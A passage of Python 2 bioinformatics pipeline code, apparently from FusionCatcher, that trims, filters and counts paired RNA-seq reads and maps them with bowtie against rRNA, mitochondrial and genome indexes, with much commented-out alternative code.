job.add('--trim_end','5',kind='parameter') # job.add('--trim_size',options.trim_5end,kind='parameter') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') if options.trim_5end > 0: job.add('-b',options.trim_5end,kind='parameter') if options.trim_3end > 0: job.add('-e',options.trim_3end,kind='parameter') job.add('',input_file,kind='input', temp_path='no') job.add('>',output_file,kind='output') job.run() else: job.link(input_file, output_file, temp_path='no') #input_file = output_file #output_file = input_file[:input_file.rfind('.fq')]+'-t3.fq' #if options.trim_3end > 0: # # trim 3 ## job.add('trim_reads.py',kind='program') ## job.add('--input',input_file,kind='input', temp_path=temp_flag) ## job.add('--output',output_file,kind='output') ## job.add('--trim_end','3',kind='parameter') ## job.add('--trim_size',options.trim_3end,kind='parameter') ## job.run() # job.add('seqtk',kind='program') # job.add('trimfq',kind='parameter') # job.add('-e',options.trim_5end,kind='parameter') # job.add('',input_file,kind='input', temp_path=temp_flag) # job.add('>',output_file,kind='output') # job.run() #else: # job.link(input_file, output_file, temp_path=temp_flag) input_file = output_file output_file = outdir('reads.fq') if options.trim_3end_keep > 0: # trim from 3-end to have the reads all the same length job.add(_FC_+'trim_reads.py',kind='program') job.add('--input',input_file,kind='input', temp_path=temp_flag) job.add('--output',output_file,kind='output') job.add('--trim_end','3',kind='parameter') job.add('--trim_n',kind='parameter') job.add('--final_size',options.trim_3end_keep,kind='parameter') job.run() # job.add('seqtk',kind='program') # job.add('trimfq',kind='parameter') # #job.add('-q','0',kind='parameter') # job.add('-l','1',kind='parameter') # job.add('-B',options.trim_3end_keep,kind='parameter') # job.add('',input_file,kind='input', temp_path=temp_flag) # job.add('>',output_file,kind='output') # job.run() else: job.link(input_file, output_file, temp_path=temp_flag) if options.skip_fastqtk: # compute the read lengths for the input file job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',outdir('reads.fq'),kind='input') job.add('--output',outdir('log_lengths_reads.txt'),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('lengths',kind='parameter') job.add('',outdir('reads.fq'),kind='input') job.add('',outdir('log_lengths_reads.txt'),kind='output') job.run() #job.add(kind='program') len_reads = 0 if os.path.exists(outdir('log_lengths_reads.txt')): len_reads = int(float(file(outdir('log_lengths_reads.txt'),'r').readline().rstrip('\r\n'))) # reads shorter than this will be skipped from analysis, 34? minimum_length_short_read = len_reads if job.run(): file(outdir('log_minimum_length_short_read.txt'),'w').write(str(minimum_length_short_read)) min_len_reads = 0 if os.path.exists(outdir('log_minimum_length_short_read.txt')): min_len_reads = int(float(file(outdir('log_minimum_length_short_read.txt'),'r').readline().rstrip())) # save lengths reads info(job, fromfile = outdir('log_lengths_reads.txt'), tofile = info_file, top = ["Lengths of all reads after trimming:", "------------------------------------"], bottom = "\n\n\n") # job.add('printf',kind='program') # job.add('"\nLength Reads (after trimming):\n--------------------------\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_lengths_reads.txt'),kind='input') # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() ############################################################################## # FILTERING - ambiguous + Bs + too short ############################################################################## if options.skip_b_filtering: #job.link(outdir('reads.fq'), outdir('reads_no-shorts.fq'), temp_path=temp_flag) job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-L',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') job.add('',outdir('reads.fq'),kind='input',temp_path=temp_flag) #job.add('>',outdir('reads_no-shorts.fq'),kind='output') if (not options.all_reads_junction) and (not options.skip_interleave_processing): job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('dropse',kind='parameter') job.add('-',kind='parameter') job.add('>',outdir('reads_acgt.fq'),kind='output') job.run() else: job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-L',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') job.add('',outdir('reads.fq'),kind='input',temp_path=temp_flag) #job.add('>',outdir('reads_no-shorts.fq'),kind='output') if (not options.all_reads_junction) and (not options.skip_interleave_processing): job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('dropse',kind='parameter') job.add('-',kind='parameter') job.add('|',kind='parameter') # fix Illumina "B" job.add(_FC_+'fastq_b2n.py',kind='parameter') #job.add('--input',input_file,kind='input',temp_path=temp_flag) job.add('--input','-',kind='parameter') job.add('--replacement','A',kind='parameter') job.add('--sanger',kind='parameter') job.add('--ambiguous',kind='parameter') job.add('--threshold',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file = 'yes') #job.add('--output',output_file,kind='output') #job.add('--output',outdir('reads_b2n2a.fq'),kind='output') job.add('--output','-',kind='output') #job.run() # filter out the reads with poly tail # trim the poly tails #job.add('trim_poly_tails.py',kind='program') job.add('|',kind='parameter') job.add(_FC_+'trim_poly_tails.py',kind='parameter') #job.add('--input',outdir('reads_b2n2a.fq'),kind='input',temp_path=temp_flag) job.add('--input','-',kind='parameter') job.add('--repeats',length_anchor_minimum - 1,kind='parameter') # 12 #job.add('--skip_reads',kind='parameter') job.add('--output','-',kind='parameter') job.add('2>>',outdir('info.txt'),kind='output') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('seq',kind='parameter') job.add('-L',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') #job.add('',outdir('reads_b2n2a.fq'),kind='input',temp_path=temp_flag) job.add('-',kind='parameter') #job.add('>',outdir('reads_no-shorts.fq'),kind='output') if (not options.all_reads_junction) and (not options.skip_interleave_processing): job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('dropse',kind='parameter') job.add('-',kind='parameter') job.add('>',outdir('reads_acgt.fq'),kind='output') job.run() #convert ambiguous nucleotides to As #job.add('fastq2acgt.py',kind='program') #job.add('--input',outdir('reads_b2n.fq'),kind='input',temp_path=temp_flag) #job.add('--output',outdir('reads_b2n2a.fq'),kind='output') #job.run() if pigz: job.add(_PZ_+'pigz',kind='program') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='program') job.add('--fast',kind='parameter') job.add('-c',outdir('originala.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('originala.fq.gz'),kind='output') job.run() # remove reads shorter than a given threshold # job.add('remove_shorter_reads.py',kind='program') # job.add('--input',outdir('reads_b2n2a.fq'),kind='input',temp_path=temp_flag) # job.add('--threshold',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') # job.add('--output',outdir('reads_no-shorts.fq'),kind='output') # job.run() # job.add('seqtk',kind='program') # job.add('seq',kind='parameter') # job.add('-L',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') # job.add('',outdir('reads_b2n2a.fq'),kind='input',temp_path=temp_flag) # job.add('>',outdir('reads_no-shorts.fq'),kind='output') # job.run() # remove the reads which do not form a pair ## if (not options.all_reads_junction) and (not options.skip_interleave_processing): # assumption all reads are interleaved # job.add('remove_single_reads.py',kind='program') # job.add('--input',outdir('reads_no-shorts.fq'),kind='input',temp_path=temp_flag) # job.add('--interleaved',kind='parameter') # job.add('--output',outdir('reads_acgt.fq'),kind='output') # job.add('--log',outdir('log_reads2_removed.txt'),kind='output') # job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') # job.add('--processes',options.processes,kind='parameter',checksum='no') # job.add('2>',outdir('log_removed_single_reads1.txt'),kind='parameter',checksum='no') # job.run() # job.add('cat',kind='program') # job.add('',outdir('reads_no-shorts.fq'),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('paste','- - - -',kind='parameter') # job.add('|',kind='parameter') # job.add('awk',kind='parameter') # job.add('-F"\\\\t"',kind='parameter') # job.add("""'{ n=length($1); if (olde=="/1" && substr($1,0,n-1)==old && substr($1,n-1,2)=="/2") {print old1"\\n"old2"\\n+\\n"old3"\\n"$1"\\n"$2"\\n+\\n"$4; old=""; count++} {old=substr($1,0,n-1); olde=substr($1,n-1,2); old1=$1; old2=$2; old3=$4}} END{print NR-2*count > "%s"}'""" % (outdir('log_removed_single_reads1.txt'),),kind='parameter') # job.add('',outdir('log_removed_single_reads1.txt'),kind='output',command_line='no') # job.add('>',outdir('reads_acgt.fq'),kind='output') # job.run() ## job.add('seqtk',kind='program') ## job.add('dropse',kind='parameter') ## job.add('',outdir('reads_no-shorts.fq'),kind='input',temp_path=temp_flag) ## job.add('>',outdir('reads_acgt.fq'),kind='output') ## job.run() # job.add('printf',kind='program') # job.add(('"\n\nCount of short reads removed due to missing their mate read:\n'+ # '-----------------------------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_removed_single_reads1.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() ## else: ## job.link(outdir('reads_no-shorts.fq'),outdir('reads_acgt.fq'),temp_path=temp_flag) job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_acgt.fq'),kind='input') job.add('|',kind='parameter') job.add("echo $((`wc -l`/4))",kind='parameter') job.add('>>',outdir('log_removed_single_reads1.txt'),kind='output') job.run() info(job, fromfile = outdir('log_removed_single_reads1.txt'), tofile = info_file, top = ["\n\nCount of all short reads after removing reads due to missing their mate read:", "-----------------------------------------------------------------------------"], bottom = "\n\n\n") if job.iff(empty(outdir('reads_acgt.fq')),id = "#reads_acgt.fq#"): t = ["ERROR: Too many reads have been removed during the pre-filtering steps!", "Please, check that the input files are from a RNA-seq dataset with pair-reads ", "or that the input files are given correctly!" "Please, check that also the input reads have the same length!" ] t = '\n'.join(t)+'\n' print >>sys.stderr, t file(info_file,'a').write(t) file(log_file,'a').write(t) job.clean(outdir('original.fq'),temp_path=temp_flag) job.clean(outdir('origi.fq'),temp_path=temp_flag) job.clean(outdir('original.fq.gz'),temp_path=temp_flag) job.clean(outdir('originala.fq'),temp_path=temp_flag) job.clean(outdir('originala.fq.gz'),temp_path=temp_flag) job.clean(outdir('log_lengths_original_reads.txt'),temp_path=temp_flag) job.clean(outdir('log_lengths_original_reads_plus.txt'),temp_path=temp_flag) job.clean(outdir('log_lengths_original_reads_final.txt'),temp_path=temp_flag) # job.clean(outdir('log_lengths_reads.txt'),temp_path=temp_flag) job.clean(outdir('log_removed_single_reads1.txt'),temp_path=temp_flag) job.clean(outdir('log_minimum_length_short_read.txt'),temp_path=temp_flag) job.clean(outdir('reads_acgt.fq'),temp_path=temp_flag) job.close() sys.exit(1) no_reads = 0 if os.path.isfile(outdir('log_removed_single_reads1.txt')): no_reads = int(float(file(outdir('log_removed_single_reads1.txt'),'r').readline().strip())) #### #### if not options.skip_automatic_scaling: if max_len_reads and max_len_reads < 60: options.skip_bowtie2 = True # options.skip_bwa = True options.skip_star_bowtie = True if not is_optparse_provided(parser,'limit_star'): options.limit_star = int(2.7 * (2**30)) job.add('printf',kind='program') job.add(('"\nInput reads are too short (maxim found length is %d) and therefore BOWTIE2 method is disabled automatically!\n"') % (max_len_reads,),kind='parameter') job.add('>>',info_file,kind='output') job.run() if (not is_optparse_provided(parser,'mismatches_psl')) and (not is_optparse_provided(parser,'trim_psl_3end_keep')): if max_len_reads > 109: options.trim_psl_3end_keep = max_len_reads - 20 options.mismatches_psl = int(math.ceil(float(options.trim_psl_3end_keep)/50)) job.add('printf',kind='program') job.add('"\nAdjusted automatically mismatches_psl and trim_psl_3end_keep (%d,%d) because reads of maximum length of %d bp were found!.\n\n"' % (options.trim_psl_3end_keep,options.mismatches_psl,max_len_reads),kind='parameter') job.add('>>',info_file,kind='output') job.run() # if no_reads and max_len_reads > 60 and no_reads < 35000000 and (not is_optparse_provided(parser,'aligners')): # options.skip_bowtie2 = False # job.add('printf',kind='program') # job.add('"\nEnabled automatically Bowtie2 aligner!\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() if (no_reads and (not is_optparse_provided(parser,'spanning_pairs')) and (not is_optparse_provided(parser,'spanning_reads')) and (not is_optparse_provided(parser,'length_anchor')) and # (not options.sensitive) and # (not options.mildly_sensitive) and # (not options.highly_sensitive) and (not options.paranoid_sensitive)): if no_reads < 35000000 and no_reads >= 15000000 and max_len_reads < 60: spanning_pairs_bowtie = 3 spanning_pairs_minimum = min([spanning_pairs_bowtie,spanning_pairs_blat,spanning_pairs_star,spanning_pairs_bowtie2,spanning_pairs_spotlight]) spanning_reads_bowtie = 2 spanning_reads_minimum = min([spanning_reads_bowtie,spanning_reads_blat,spanning_reads_star,spanning_reads_bowtie2,spanning_reads_spotlight]) length_anchor_bowtie = 14 length_anchor_minimum = min([length_anchor_bowtie,length_anchor_bowtie2,length_anchor_star,length_anchor_blat,length_anchor_spotlight]) job.add('printf',kind='program') job.add('"\nAdjusted automatically spanning_pairs, spanning_reads, and length_anchor (%d,%d,%d,%d) for count of reads [15000000,3500000) and reads shorter than 60bp.\n\n"' % (spanning_pairs_bowtie,spanning_reads_bowtie,length_anchor_bowtie,length_anchor_spotlight),kind='parameter') job.add('>>',info_file,kind='output') job.run() elif no_reads < 15000000 and no_reads >= 2 and max_len_reads < 75: spanning_pairs_bowtie = 2 spanning_pairs_minimum = min([spanning_pairs_bowtie,spanning_pairs_blat,spanning_pairs_star,spanning_pairs_bowtie2,spanning_pairs_spotlight]) spanning_reads_bowtie = 2 spanning_reads_minimum = min([spanning_reads_bowtie,spanning_reads_blat,spanning_reads_star,spanning_reads_bowtie2,spanning_reads_spotlight]) length_anchor_bowtie = 13 length_anchor_minimum = min([length_anchor_bowtie,length_anchor_bowtie2,length_anchor_star,length_anchor_blat,length_anchor_spotlight]) job.add('printf',kind='program') job.add('"\nAdjusted automatically spanning_pairs, spanning_reads, and length_anchor (%d,%d,%d,%d) for count of reads [1000000,15000000) and reads shorter than 60bp.\n\n"' % (spanning_pairs_bowtie,spanning_reads_bowtie,length_anchor_bowtie,length_anchor_spotlight),kind='parameter') job.add('>>',info_file,kind='output') job.run() elif no_reads < 35000000 and no_reads >= 2 and max_len_reads > 74: spanning_pairs_bowtie = 2 spanning_pairs_minimum = min([spanning_pairs_bowtie,spanning_pairs_blat,spanning_pairs_star,spanning_pairs_bowtie2,spanning_pairs_spotlight]) spanning_reads_bowtie = 2 spanning_reads_minimum = min([spanning_reads_bowtie,spanning_reads_blat,spanning_reads_star,spanning_reads_bowtie2,spanning_reads_spotlight]) job.add('printf',kind='program') job.add('"\nAdjusted automatically spanning_pairs, spanning_reads, and length_anchor (%d,%d,%d,%d) for count of reads [1000000,20000000) and reads longer than 74 bp.\n\n"' % (spanning_pairs_bowtie,spanning_reads_bowtie,length_anchor_bowtie,length_anchor_spotlight),kind='parameter') job.add('>>',info_file,kind='output') job.run() #### #### if job.run(): if (2 * length_anchor_minimum) > len_reads - 1: job.write(["ERROR: The length of the anchor (i.e. %s) is too long compared to the length of the reads (i.e. %d )" % (options.length_anchor,len_reads), "Suggestion 1: Decrease the length of the anchor using '--anchor-fusion' option if possible!", "Suggestion 2: Decrease the size of the trimming using '--5end' or '--5keep' option if possible!", ], stdout = True, stderr = True, log = True) job.close() sys.exit(1) # if job.iff(not empty(outdir('log_reads2_removed.txt')),id = "#log_reads2_removed.txt#"): # r = float(file(outdir('log_reads2_removed.txt'),'r').readline()) # if r > 0.7: # t = ["ERROR: Too many reads (that is %.3f%%) have been removed because they miss theirs read-mates!" % (r,), # "Please, check that the input files are from a RNA-seq dataset with pair-reads or that the input files are given correctly!" # ] # t = '\n'.join(t)+'\n' # print >>sys.stderr, t # file(info_file,'a').write(t) # file(log_file,'a').write(t) # job.close() # sys.exit(1) # job.clean(outdir('log_reads2_removed.txt'),temp_path=temp_flag) ############################################################################## # FILTERING - ribosomal DNA + mitochondrion ############################################################################## # find available memory job.add('printf',kind='program') job.add('"\n============\nMEMORY (before using BOWTIE):\n============\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('free',kind='program') job.add('-m',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() # map using the filter index (not aligned, unique alignment, multiple alignments) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') #job.add('-v',options.filter_mismatches,kind='parameter') #options.mismatches job.add('--seedmms','1',kind='parameter') # options.mismatches job.add('--seedlen',options.trim_3end_keep,kind='parameter') job.add('--trim5','7',kind='parameter') # trim the 10 #job.add('-v','1',kind='parameter') #options.mismatches job.add('-p',options.processes,kind='parameter',checksum='no') #job.add('-m','1',kind='parameter') job.add('-k','1',kind='parameter') #job.add('--solexa1.3-quals',kind='parameter') job.add('--phred33-quals',kind='parameter') #job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') #job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') # if len_reads > 40 and options.trim_wiggle: # job.add('--trim3',options.trim_wiggle,kind='parameter') # trim on the fly 5bp from 3' end # job.add('--trim5',options.trim_wiggle,kind='parameter') # trim the 5 # job.add('--suppress','1,2,3,4,5,6,7,8',kind='parameter') job.add('--un',outdir('reads-filtered_temp.fq'),kind='output') # here is the result job.add('--max',outdir('reads-filtered_temp_multiple.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if options.skip_mitochondrion_filtering: if os.path.isfile(datadir('rtrna_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('rtrna_index/'),kind='input') else: if os.path.isfile(datadir('rtrna_hla_mt_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('rtrna_hla_mt_index/'),kind='input') job.add('',outdir('reads_acgt.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads-filtered.map'),kind='output',temp_path=temp_flag) # job.add('','/dev/null',kind='parameter') job.add('2>',outdir('log_bowtie_reads-filtered-out.stdout.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bowtie_reads-filtered-out.stdout.txt'), tofile = info_file, top = ["Mapping all input reads on rRNA and/or MT for filtering purposes:", "----------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag) # job.add('printf',kind='program') # job.add(('"\n\nMapping all input reads on rRNA and/or MT for filtering purposes:\n'+ # '-----------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_bowtie_reads-filtered-out.stdout.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # remove the reads which map on PHIX174 which is used for improving the quality of Illumina NGS #job.link(outdir('reads-filtered_temp.fq'),outdir('reads-filtered_temp-phix.fq'),temp_path=temp_flag) #job.link(outdir('reads-filtered_temp-phix.fq'),outdir('reads-filtered_temp-hla.fq'),temp_path=temp_flag) # remove the reads which do not form a pair if (not options.all_reads_junction) and (not options.skip_interleave_processing): # assumption all reads are not interleaved job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads-filtered_temp.fq'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('paste','- - - -',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') if parsort: job.add(_PL_+'parsort',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-t',"'\\\t'",kind='parameter') job.add('--parallel',options.processes,kind='parameter',checksum='no') if parsort_buffer_size: job.add('--buffer-size',parsort_buffer_size,kind='parameter',checksum='no') else: job.add('sort',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('dropse',kind='parameter') #job.add('-',kind='parameter') job.add('>',outdir('reads-filtered.fq'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads-filtered.fq'),kind='input') job.add('|',kind='parameter') job.add("echo $((`wc -l`/4))",kind='parameter') job.add('>>',outdir('log_removed_single_reads2.txt'),kind='output') job.run() # job.add('awk',kind='parameter') # job.add('-F"\\\\t"',kind='parameter') # job.add("""'{n=length($1); if (olde=="/1" && substr($1,0,n-1)==old && substr($1,n-1,2)=="/2") {print old1"\\n"old2"\\n+\\n"old3"\\n"$1"\\n"$2"\\n+\\n"$4; old=""; count++} {old=substr($1,0,n-1); olde=substr($1,n-1,2); old1=$1; old2=$2; old3=$4}} END {print NR-2*count > "%s"}'""" % (outdir('log_removed_single_reads2.txt'),),kind='parameter') # job.add('',outdir('log_removed_single_reads2.txt'),kind='output',command_line='no') # job.add('>',outdir('reads-filtered.fq'),kind='output') # job.run() # job.add('tr',kind='parameter') # job.add('"\\t"',kind='parameter') # job.add('"\\n"',kind='parameter') # job.add('|',kind='parameter') # job.add('remove_single_reads.py',kind='parameter') # ##job.add('--input',outdir('reads-filtered_temp-phix.fq'),kind='input',temp_path=temp_flag) # job.add('--interleaved',kind='parameter') # job.add('--input','-',kind='input') # job.add('--output',outdir('reads-filtered.fq'),kind='output') # job.add('--log',outdir('log_reads1_removed.txt'),kind='output') # job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') # job.add('--processes',options.processes,kind='parameter',checksum='no') # job.add('2>',outdir('log_removed_single_reads2.txt'),kind='parameter',checksum='no') # job.run() info(job, fromfile = outdir('log_removed_single_reads2.txt'), tofile = info_file, top = ["\n\nCount of all short reads after removing reads due to missing their mate read:", "-----------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag) # job.add('printf',kind='program') # job.add(('"\n\nCount of short reads removed due to missing their mate read:\n'+ # '-----------------------------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_removed_single_reads2.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() else: job.link(outdir('reads-filtered_temp.fq'),outdir('reads-filtered.fq'),temp_path=temp_flag) if job.run(): if not empty(outdir('log_reads1_removed.txt')): r = float(file(outdir('log_reads1_removed.txt'),'r').readline()) if r > 0.7: t = ["ERROR: Too many reads (that is %.3f%%) have been removed because they miss theirs read-mates!" % (r,), "Please, check that the input files are from a RNA-seq dataset with pair-reads or that the input files are given correctly!" ] t = '\n'.join(t)+'\n' print >>sys.stderr, t file(info_file,'a').write(t) file(log_file,'a').write(t) job.close() sys.exit(1) job.clean(outdir('log_reads1_removed.txt'),temp_path=temp_flag) job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads-filtered.fq'),kind='input') job.add('|',kind='parameter') job.add("echo $((`wc -l`/4))",kind='parameter') job.add('>',outdir('count_reads_left_after_filtering.txt'),kind='output') job.run() info(job, fromfile = outdir('count_reads_left_after_filtering.txt'), tofile = info_file, top = ["Total Reads Counts (after the all filtering steps):", "---------------------------------------------------"], bottom = "\n\n\n") # job.add('printf',kind='program') # job.add(('"\nTotal Reads Counts (after the all filtering steps):\n'+ # '--------------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('count_reads_left_after_filtering.txt'),kind='input') # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() if job.iff(empty(outdir('reads-filtered.fq')),id = "#reads-filtered.fq#"): t = ["ERROR: Too many reads have been removed during the pre-filtering steps!", "Please, check that the input files are from a RNA-seq dataset with pair-reads " "or that the input files are given correctly!" ] t = '\n'.join(t)+'\n' print >>sys.stderr, t file(info_file,'a').write(t) file(log_file,'a').write(t) job.close() sys.exit(1) if not options.skip_genome_filtering: ############################################################################## # MAPPING short reads against the genome ############################################################################## # map using the genome index (not aligned, unique alignment, multiple alignments); results in MAP BOWTIE format job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') #job.add('-k','2',kind='parameter') job.add('-k','200',kind='parameter') #job.add('-v','1',kind='parameter') # options.filter_mismatches # stjude job.add('-v','0',kind='parameter') # options.filter_mismatches # stjude job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-m','20',kind='parameter') #job.add('-m','2',kind='parameter') #job.add('-k','1',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') #job.add('--solexa1.3-quals',kind='parameter') job.add('--phred33-quals',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') # job.add('--tryhard',kind='parameter') # ??? really necessary? stjude job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--un',outdir('reads_filtered_not-mapped-genome.fq'),kind='output') job.add('--max',outdir('reads-filtered_multiple-mappings-genome.fq'),kind='output') # if this is missing then these reads are going to '--un' if bowtie123: job.add('',datadir('genome_index2/index'),kind='input') else: if os.path.isfile(datadir('genome_index2','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('genome_index/'),kind='input') job.add('',outdir('reads-filtered.fq'),kind='input') job.add('',outdir('reads_filtered_genome.map'),kind='output') # <== best mappings on genome ####### job.add('2>',outdir('log_bowtie_reads_mapped-genome.stdout.txt'),kind='parameter',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bowtie_reads_mapped-genome.stdout.txt'), tofile = info_file, top = ["Mapping the filtered reads on genome:", "-------------------------------------"], bottom = "\n\n\n") # job.add('printf',kind='program') # job.add(('"\n\nMapping the filtered reads on genome:\n'+ # '-----------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_bowtie_reads_mapped-genome.stdout.txt'),kind='input') # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # extract the names of the short reads which mapped on the genome job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f','1',kind='parameter') job.add('',outdir('reads_filtered_genome.map'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('list-names-reads-filtered_genome.txt'),kind='output') job.run() if not options.split_seqtk_subseq: #extract the short reads which mapped on genome job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--input',outdir('reads-filtered.fq'),kind='input') job.add('--list',outdir('list-names-reads-filtered_genome.txt'),kind='input') job.add('--output',outdir('reads_filtered_unique-mapped-genome.fq'),kind='output') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: #extract the short reads which mapped on genome job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-filtered.fq'),kind='input') job.add('',outdir('list-names-reads-filtered_genome.txt'),kind='input') job.add('>',outdir('reads_filtered_unique-mapped-genome.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('reads-filtered.fq'),kind='input') job.add('',outdir('list-names-reads-filtered_genome.txt'),kind='input') job.add('',outdir('reads_filtered_unique-mapped-genome.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option 